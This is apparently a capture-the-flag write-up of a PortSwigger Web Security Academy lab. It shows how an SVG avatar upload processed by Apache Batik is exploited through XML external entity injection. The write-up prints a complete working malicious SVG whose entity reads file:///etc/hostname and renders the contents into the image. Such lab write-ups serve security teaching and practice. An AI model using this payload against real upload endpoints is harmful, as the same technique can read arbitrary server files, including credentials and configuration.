| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | XXE — SVG File Upload |
| Difficulty | Practitioner |
| Objective | Upload a malicious SVG that reads /etc/hostname and submit the value |
Exploiting XXE via Image File Upload — Writeup¶
Initial Observation¶
The comment section on any post allows uploading an avatar image:
The lab mentions Apache Batik is used to process avatar files. Batik is an SVG rendering library for Java — and SVG is XML. If Batik processes the SVG server-side to render it, any external entity declarations in that SVG will be processed by the XML parser.
Attack Path¶
Crafting the Malicious SVG¶
SVG is an XML-based format, which means we can embed a DOCTYPE with an external entity declaration directly in the file. The entity value loads /etc/hostname, and we reference it inside a <text> element so the resolved content gets rendered into the image:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Saving this as a .svg file and uploading it as the avatar:
The avatar renders with some characters visible. Opening the image in a new tab shows the hostname rendered as text inside the SVG:
Submitting the hostname value solves the lab o.o